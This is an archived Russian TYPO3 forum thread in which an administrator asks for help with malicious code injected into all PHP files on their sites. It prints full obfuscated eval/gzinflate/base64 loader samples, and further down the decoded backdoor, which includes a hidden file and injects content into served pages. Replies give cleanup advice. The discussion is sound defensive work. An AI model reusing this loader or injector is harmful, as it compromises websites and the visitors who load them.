Russian TYPO3 community - Помогите что за вирус?

Russian TYPO3 community (http://forum.typo3.ru/index.php)

- Общие вопросы (http://forum.typo3.ru/forumdisplay.php?f=12)

- - Помогите что за вирус? (http://forum.typo3.ru/showthread.php?t=10374)

Помогите что за вирус?

недавно на всех typo3 сайтах на одном из моих серверов, во всех php файлах обнаружил добавленным такой код. Вот пытаюсь расшифровать, никак не выходит, помогите пожалуйста.

PHP код:


		
			
$md5 = "89bc86968a0ff8960b640edcf06de95e";
$a6 = array('t',"_","6",'4',"n",'z','g','c',")",'s','f',"l","i","a","v",'b','$','d',"e","o",';',"r",'(');
$b65 = create_function('$'.'v',$a6[18].$a6[14].$a6[13].$a6[11].$a6[22].$a6[6].$a6[5].$a6[12].$a6[4].$a6[10].$a6[11].$a6[13].$a6[0].$a6[18].$a6[22].$a6[15].$a6[13].$a6[9].$a6[18].$a6[2].$a6[3].$a6[1].$a6[17].$a6[18].$a6[7].$a6[19].$a6[17].$a6[18].$a6[22].$a6[16].$a6[14].$a6[8].$a6[8].$a6[8].$a6[20]);
$b65('DZZFssWIAQOPk5nywkyVlZmZvUmZmZ/x9PlnkFrq6srGf5qvm+sx+1X/5NlREdj/yqpYyuqf//BpKh6LmzGDF0MgJTOA10GeRRVmqbJYyGMFuQEE1Po4aVDHA4C0e1lwBuYcCAJRmnuVDmrUSmnHCoKdNUpxM9fgDPtD4FRGUTUD2wkoqEkCLM5Hc1vSnjds0o42PmaEc/GMurKJ59ZJcpgb1KlAg8o0UZM9QvFL4gGs9hYWwDQI8ip9RtuTGr/6SNGLh8H4sOO+az6eEjUHXUx9uKGUkO1QVXB2sE4DUlJCsOSCuyL5uHzoXTp4aT+1lZ+axGvekJ18FotlTmXeJwlQ1Vvg/rQy5EYERvJQ3m1SuLiaj2De4vrRrh3DB8l0A+vlDYhAvzYRfixv/lXljPXpDj/k4NAua/HobotcsBQoZZuuyZGgWnpVGpP4gTYURDi+SOa/I03I8i1MHf+Zatw9TeMk4bnwFuqDkvTlqIYCiLSMZDNuVENh+jTWFYOguo9oFZsp/G7npVV+l7JF3l+OOVchwcCkhzRv6Lwt79Q8Dw6q4suv+3rN63Tv2DRucGBcZyUXg3FEB4e7NX7ulKZQbV4G8Vj6jpEBeVfU8z0biI6Ti0nCyYcU2ddl1OwkDOd+CqpTZGkpEhIYhheU/Zpj6m0t79dpO1l+X56AfSmTr06/Wq50ardgXjCuQo+XSRfvR1xH9GncemDEHLShMux/68ZHhk0z+XvxQEKs5zkR9AGv5DGU/K0tkaMr2Qmo70RnXnydef/MklaamrF+omG208OAfnXHTOSvH5VzES8sZsQ5aNqxvVwl3Wm1NHXe/vxpeqojiSs9KojbmZFa1mZzZXBCjq6x/NDCQTZ1SjWS4qcmAbEn5+ZyK5BkpKzf1vd8jhhtrHa+pZKtc8pP5Xhev4e7XgUA7kSLw65Zfwjfyc0Cy0YvAmjVapixD1kynzH7frbEtLu3lJNo9T8TNS8ZHDyUu4QXN5/9wDnPBIiqJThDhhmKNlWCZ9XaAOC2QpAYSTss3jEpzqEjERcZs3sqXoAWZcK31YYtkj8YMzHx7XlvGlk/8UWGvBhaf6c2SfcBJ95LrljBaucBrQzK3Oo/3gS4bzT+zDlCDbwRg2tD/PJfU01gLgllM8S1ZaqssZJup3HnrUwQsOomBbCKcvZ016Evv9Vx7zkYNLjL/Eeeq5l7jLc3TJ0SUN7qZNGkNLYLTuzrzN9eziNzWqVbRPcppWj4NWuyA8EL/7FyFtX25Qzc+J0pa0WXZ9Q6AsnKaaJ1tV6VMc7Prl/N/MYvC2yAfBmQO4XY/GihkHPubneS9rObntCwNn2C8HGIHQ0OKW0s3iZvahfMZEzl2uMQrvHl74d2sjGU47acvaAw5tWUE3XnKGv2PWhi6dJDcRRTwF8qeCzYtE9JMhCYjuZUJLq+yYajuLjEB1AGieCzdsJUtTHg1c/pTdTXWiG6VUO4eNFt06rFebBTcVBQSI3/LNwdE3XWewNy0MwBWluUR5HmTNHP39sKP86rxWa6GHO29wW7A3/VJ+/aB93V5A/HKRlqr7sHNv6dFEz22USKqzXkttzYCT9aNhu2nHFz2qbZAnk1d4LgQevxmmqN3TGkqUUGgEYFluvtML3v8xNL3U7ChGLEiWUzhOEAdF6v0GXyBveEvkHHQdcEk8TzQfrnRyj/MNgOt0QouHRXOXeROcslhJh4DdADD5suFu5+DVqe+gWR4By8wo/4mxYvDGjISXQcwGiIjQSi97UfMybrV2p+IH877bT0nJbT7PJ+OmH9vXJw18dU4ORlOIJxRo7RGNbTOd5n7FoZtFEkfCHvc19oy2k25xtsHyWAnT1SlZr0REu9UrGj97cuDlpDNHqCWuaQtw+9k03A9gjQfChGIHX0+Tq72V/zLjIu6uU3hK/UtWfqVEMqHAygUNf++HRO6ADU/L79+uTH6h8D6BtlseCkXt94CXrhJtPQY1rPUMxRzM60zNxX/TVDG6mjFzRH7FPAq//cbKBo3fH56JzRQWQxWOH8GXgLTym6jeMSQPYYvYtA/teUZRzWfcz3VfFSaju4woyQQHpDVAa0IuHYswpfRFG3YUrwKEZmc1df3T0j4SJn3uyBv5KPVcJdbuPO76zbVxnNNa7w69LZLYAfkt4LfmLXCpgH4kwLfM3yJUhKjhSR7akMyEJEB4mYZeFa1cXiTw6w0gOT3P1YKuUQtlIHEFObVbLIJEXh7eHqU68npQx0PDG81/oj86ztrTGV9gcYP/i0Q7IaZj8ZrQ4pa1IYGYu6GzgaACbOXpIrgLh0L/yt2I7876a40OaX10glXsmeWbPzrlz6Rj2YBa7y/MTpbTEC4WVVwrvtPls7B9+AT6yOAwUD4MD73Kl2iAmOwaSsLGKMdXcvpLGG5J7cxgmtLD5OrQ7Ny+qVCwi4ZAOB7LuGOveFQHOOZsyCXYHcFhH5/GWQUEJEOUooSvliAbTJUtIoFXb1Q91t2Xxju6gje0Xc3g7lXoyNUuYJg1QPw874Pbt2TmAwDcjFVtk4hc9CAszUjapW/qxL2m1uA+TR7yxiOYu/sDu+Udl4E+bp+aElOUMCbVSph3CSTZ2gIAt3Thzrc2OVqP4BOyCpUZ/2v+mgRo0D2Pramb2VNIf9U5/2ytmrKbIlqIZWxpeq5JEsDtRjbLQ/giQKx/ALpR2MEVrw19zTXEZ8UcZMV9oqjd/wSjjt20d4grgK5w7jYdqWqWSz2TD5n5eMOSWHDd5TtH/nRH+6aUPyz49OixlWGBIPEQwYKDx3QQYFMKn82T/N32/4GiMYkH9kvRCO9ScTCIwhj2/+3ICE/mxU2Q6uzmlN2/USFqD0rKBfpwwy5GPjC1gFHvUINvFWE19YVR9NW9lt/tEpQsDj/HOiKInjE4PJZD/zTKU+dNGTpEfsYJBYBz1t1fi54Q+lmulEnCM+0ItAD7LzjzlWDCJM0jYGS3eXiu9JSEKxIayis3CWM/wD+e3bY5E4r02mtPrlBNaZ5/SR0r39fLJaVCWbgFiRzdX7xRK/H4HRgsO201mZEs6e2DechqHPGwHPm2BV1zUI0iRIsf/5999///t/');

видно что создается функция

PHP код:


		
			
function  lambda($v)
{
return eval(gzinflate(base64_decode($v)));
};

Но при вызове в таком порядке текст всё равно не читаем.

Возможно Вы поставили что то левое - или кто-то взломал-поиграл...
Что добавляет этот код - если это php - то нужно искать файл, который перезаписывает файлы...

У меня был случай - после работы по FTP во всех js-файлах был добавлен уродский код... Из-за него антивирусы блокировали сайт.
Он добавлялся из одного места и постепенно при запросе новых страниц, распространился на весь сайт - во все js скрипты...

Лечил очень просто...
Заменил все что *.js на оригинал из скачанного с сайта typo3.org

Т.к. у Вас php- то скорее всего кто-то уже знает пароль к FTP...

Сюдя по тому, что он выполняет функцию eval - значит это какая-то команда.
Можно попробовать вместе расшифровать - если показать все что есть по вирусу...

А что еще из ПО у вас стоит на сайтах?
У нас один раз похожую заразу залили через дыру в OpenX.

В любом случае рецепт - сменить все пароли. Заменить файлы ядра на оригинальные. Из экстов - либо вручную, либо тоже обновить через репозиторий (если все их него).

Цитата:

Сообщение от Ивано (Сообщение 34761)

да да, я так и делаю: в ext отчищаю вручную,файлы движка заменяю оригинальными из новоскаченного, перенес все сайты на другой сервер,переустановил этот. Сейчас мне интересно что ж он делает та такого злодейского)

Цитата:

Сообщение от Ивано (Сообщение 34762)

я понял что выполняется, только вот как раскодировать последнее???
ну так это и есть всё что есть, в каждом файле такое, свой md5 и свой массив.Но функция одна и та же по видимому.

PHP код:


		
			
<?php
$md5 = "b7673e7d076c0db93f15da24c610a75e";
$a6 = array(";",'l',"(","z","a",'n','d','$',"_","4",'t','g','v',"r",'c',"6","f",'e',"i",'s',')','b','o');
$b61 = create_function('$'.'v',$a6[17].$a6[12].$a6[4].$a6[1].$a6[2].$a6[11].$a6[3].$a6[18].$a6[5].$a6[16].$a6[1].$a6[4].$a6[10].$a6[17].$a6[2].$a6[21].$a6[4].$a6[19].$a6[17].$a6[15].$a6[9].$a6[8].$a6[6].$a6[17].$a6[14].$a6[22].$a6[6].$a6[17].$a6[2].$a6[7].$a6[12].$a6[20].$a6[20].$a6[20].$a6[0]);
$b61('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');
?>

Цитата:

Сообщение от dmartynenko (Сообщение 34764)

Вроде никаких сторонних скриптов нет...Стоит ещё wordpress на серваке.Интересно что его даже не затронуло,там этого кода ни в каких файлах нет.Почему-то именно typo3.

Не пойму, откуда Вы взяли function lambda($v)
И откуда create_function?

У меня получилось только
eval(gzinflate(base64_decode($v)));

Мурашки по коже...

Цитата:

Сообщение от Ивано (Сообщение 34772)

Эт я просто написал, create_function — Создаёт анонимную (лямбда) функцию, чтоб легче подставить можно было для выполнения.Скопировал с кода, когда тэстил.

Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?

Цитата:

Сообщение от Ивано (Сообщение 34775)

Каково значение переменной $v?
eval(gzinflate(base64_decode($v))); - что сюда передается?

всё что в последней строке $b65('здесь');

Насколько понял - это связано с файловой системой и зашифровкой интеллектуальной собственности...

А расшифровать это дело можно так:
http://www.tareeinternet.com/scripts/decrypt.php
http://www.tareeinternet.com/forum/k...64_decode.html

--
--

Цитата:

Сообщение от Ивано (Сообщение 34778)

Да действительно, теперь расшифровал один из файлов(просто тот уже удалить успел)

PHP код:


		
			
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/palata/mrg/public_html/typo3/sysext/t3skin/icons/ext/user_photomarathon/photomarathon/04b.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Он ссылается на файл 04b.php. В нем та же фигня,и в этой папке полно таких файлов.надеюсь и дальше теперь продвинемся.

вот расшифровал и 04b.php

PHP код:


		
			
/*ounelpejlrbklsrtwdjxjouyltothgpopdfmcdwfrzbpnjklrv*/ function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C323E04D72AFAE39F53){ global $_GET, $_POST; ignore_user_abort(true); $GLOBALS['dg_echo'] = 1; set_time_limit(600); if(!is_writable($GLOBALS['dgcp'].$GLOBALS['dgin'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b>"); return; } $RF89F518E40FF53B4FD2A7D2440090D63 = ''; $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); F0B4D6FFC759ED013DCD398174DE471F8(); if(!FD768CE2E61B0A13220C1408BA2911626($RDAD8D40EB9906CAB35CCB38DE41CB7EF)){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">no php quotes</b> [e1]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("{$RC4A5B5E310ED4C323E04D72AFAE39F53}: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)); if(!FD37A89A1AF9ECAFCB257CADA0D7E94C3($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">failed to set path</b> [e2]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:green\">path set to {$GLOBALS['dgcp']}</b> [s1]"); if(!FD37A89A1AF9ECAFCB257CADA0D7E94C3($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">failed to set name</b> [e3]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:green\">name set to {$GLOBALS['dgin']}</b> [s2]"); if(!FD37A89A1AF9ECAFCB257CADA0D7E94C3($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:red\">failed to set relative root dir</b> [e4]"); die; } F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}</b> [s3]"); $RCFFAE742FB4E724571041779A10EFDA9 = F873C7424258BCBB4AE958DCB051B6110($RDAD8D40EB9906CAB35CCB38DE41CB7EF, rand(5, 10), 1, 1); $RCFFAE742FB4E724571041779A10EFDA9 = F9248B5B41A3DDFDCDF5FCF3647F21442($RCFFAE742FB4E724571041779A10EFDA9, 1); FB9B6F2F343184DBE3D84656B8346EDC1($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp", $RCFFAE742FB4E724571041779A10EFDA9, 1) ? F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#009000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}tmp</b>") : F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}tmp</b>"); $R9DB9E103E88D622316D42B508D6D11AB = implode("", file($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp")); if(!strpos($R9DB9E103E88D622316D42B508D6D11AB, '?'.'>')){ F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>wf {$GLOBALS['dgcp']}{$GLOBALS['dgin']}tmp</b>"); return; } copy($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp", $GLOBALS['dgcp'].$GLOBALS['dgin']) ? F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#009000'>{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b>") : F3B82ABE1785C7013E7CC0CA01EF61AA8("<b style='color:#a00000'>rf {$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b>"); unlink($GLOBALS['dgcp'].$GLOBALS['dgin']."tmp"); if($GLOBALS['dgsp'] && !isset($_GET['noinj']) && !isset($_POST['noinj'])){ FBD8F1A7E6108CC853593E347434C7287(); if(count($GLOBALS['dg_wpi']) > 0){ F7641DA7BE8C09F5807EB8CA8DD8C0B9A($GLOBALS['dg_wpi'][0], 1, $GLOBALS['dgij']); F7A0DC6FCF5A00BB584F0024BBAC75D65($GLOBALS['dgsp'], 0, 0); }else{ F7A0DC6FCF5A00BB584F0024BBAC75D65($GLOBALS['dgsp'], 1, 0); } } F18C82E54B87D91FDCDBDBEF3DF051362(); } if(!function_exists('gzdecode')){ function gzdecode($R20FD65E9C7406034FADC682F06732868){ $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); $R60169CD1C47B7A7A85AB44F884635E41=10; $R0D54236DA20594EC13FC81B209733931=0; if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){ $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2)); $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1]; $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){ $R60169CD1C47B7A7A85AB44F884635E41+=2; } $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41)); if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){ $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868; } return $RC4A5B5E310ED4C323E04D72AFAE39F53; } } if(!function_exists('dgobh')){ function dgobh($RDA3E61414E50AEE968132F03D265E0CF){ header('Content-Encoding: none'); $RDA3E61414E50AEE968132F03D265E0CF = gzdecode($RDA3E61414E50AEE968132F03D265E0CF); if($GLOBALS['dgopt']['lbp'] == 2 && preg_match('/\<\/body/si',$RDA3E61414E50AEE968132F03D265E0CF)){ return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n$1",$RDA3E61414E50AEE968132F03D265E0CF); }elseif($GLOBALS['dgopt']['lbp'] == 0 && preg_match('/\<body/si',$RDA3E61414E50AEE968132F03D265E0CF)){ return preg_replace('/(\<body[^\>]*\>)/si', "$1".gml(),$RDA3E61414E50AEE968132F03D265E0CF); }else{ return gml().$RDA3E61414E50AEE968132F03D265E0CF; } }}

У меня было тоже самое но с JS-как ранее писал.
Поменял пароль - и все ОК - уже пол года:D!

А вообще - резервное копирование после существенных изменений - самое лучшее лекарство...

--
Интересно будет узнать, к чему приведут поиски...

Стоят 777 на localconf.php